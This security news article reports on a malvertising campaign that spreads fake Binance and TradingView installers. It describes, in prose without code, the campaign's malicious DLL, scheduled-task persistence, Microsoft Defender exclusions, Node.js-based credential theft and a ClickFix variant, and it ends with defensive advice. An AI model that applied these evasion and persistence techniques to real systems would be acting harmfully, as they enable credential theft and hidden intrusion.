In a recent cybersecurity development, Microsoft has identified an ongoing malvertising campaign that exploits the Node.js platform to distribute malicious payloads aimed at stealing sensitive information from cryptocurrency users. This campaign, first detected in October 2024, employs deceptive tactics to lure individuals into downloading and installing counterfeit versions of popular cryptocurrency trading applications, specifically Binance and TradingView.
Deceptive Distribution Tactics
The attackers initiate their scheme by creating fraudulent websites that closely mimic the legitimate platforms of Binance and TradingView. Unsuspecting users, seeking to download these applications, are redirected to these counterfeit sites through malicious advertisements or phishing emails. Once on the fake site, users are prompted to download an installer that appears authentic but is embedded with a malicious dynamic-link library (DLL) named CustomActions.dll.
Execution and Persistence Mechanisms
Upon execution, the malicious installer performs several actions to establish a foothold on the victim’s system:
1. System Information Harvesting: The embedded DLL utilizes Windows Management Instrumentation (WMI) to collect basic system information, including operating system details, hardware specifications, and installed applications.
2. Persistence Establishment: To ensure continued access, the malware sets up a scheduled task that triggers the execution of PowerShell commands at regular intervals. This scheduled task is designed to maintain the malware’s presence on the system even after reboots.
3. User Deception: To avoid raising suspicion, the DLL launches a browser window displaying the legitimate Binance or TradingView website. This is achieved using msedge_proxy.exe, a Microsoft Edge component that can display any website as a web application, thereby convincing the user that the installation was successful and legitimate.
Advanced Evasion Techniques
The malware employs sophisticated methods to evade detection by security software:
– Defender Exclusion: The scheduled task executes PowerShell commands that add exclusions to Microsoft Defender for Endpoint, specifically targeting the running PowerShell process and the current directory. This tactic prevents the security software from scanning and detecting the malicious activities.
– Obfuscated PowerShell Commands: The malware downloads and executes obfuscated PowerShell scripts from remote servers. These scripts are designed to gather extensive information about the operating system, BIOS, hardware, and installed applications. The collected data is then converted into JSON format and transmitted to the attacker’s command-and-control (C2) server via HTTPS POST requests.
Node.js Exploitation for Malicious Payload Delivery
A critical aspect of this campaign is the use of Node.js, an open-source, cross-platform JavaScript runtime environment. The attack chain progresses as follows:
1. Node.js Deployment: The malware downloads an archive file from the C2 server containing the Node.js runtime binary and a JavaScript compiled (JSC) file.
2. Execution of Malicious JavaScript: The Node.js executable initiates the execution of the JSC file, which establishes network connections and is likely designed to exfiltrate sensitive browser information, such as saved credentials and cookies.
In an alternative infection sequence observed by Microsoft, the attackers employ a technique known as ClickFix. This method involves the inline execution of JavaScript code using malicious PowerShell commands. Instead of downloading the Node.js binary and JSC file, the malware directly executes JavaScript code that performs network discovery activities to identify high-value assets within the victim’s network. Additionally, it disguises C2 traffic as legitimate Cloudflare activity to evade detection and gains persistence by modifying Windows Registry run keys.
Implications and Recommendations
The exploitation of Node.js in this campaign underscores the evolving tactics of cybercriminals who leverage trusted platforms to deliver malware. Node.js’s widespread use and cross-platform capabilities make it an attractive tool for attackers aiming to blend malicious activities with legitimate applications, thereby bypassing conventional security controls.
To mitigate the risks associated with such sophisticated attacks, users and organizations are advised to:
– Verify Software Sources: Always download software from official and reputable sources. Be cautious of links provided through unsolicited emails or advertisements.
– Maintain Updated Security Software: Ensure that antivirus and anti-malware solutions are up to date to detect and prevent the execution of malicious scripts and binaries.
– Exercise Caution with PowerShell Scripts: Be wary of executing PowerShell commands or scripts from untrusted sources, as they can be used to deploy malware or alter system configurations maliciously.
– Monitor System Activities: Regularly review system logs and scheduled tasks for any unauthorized or suspicious activities that could indicate a compromise.
By adopting these proactive measures, users can enhance their defenses against malvertising campaigns and other cyber threats that exploit legitimate platforms for malicious purposes.
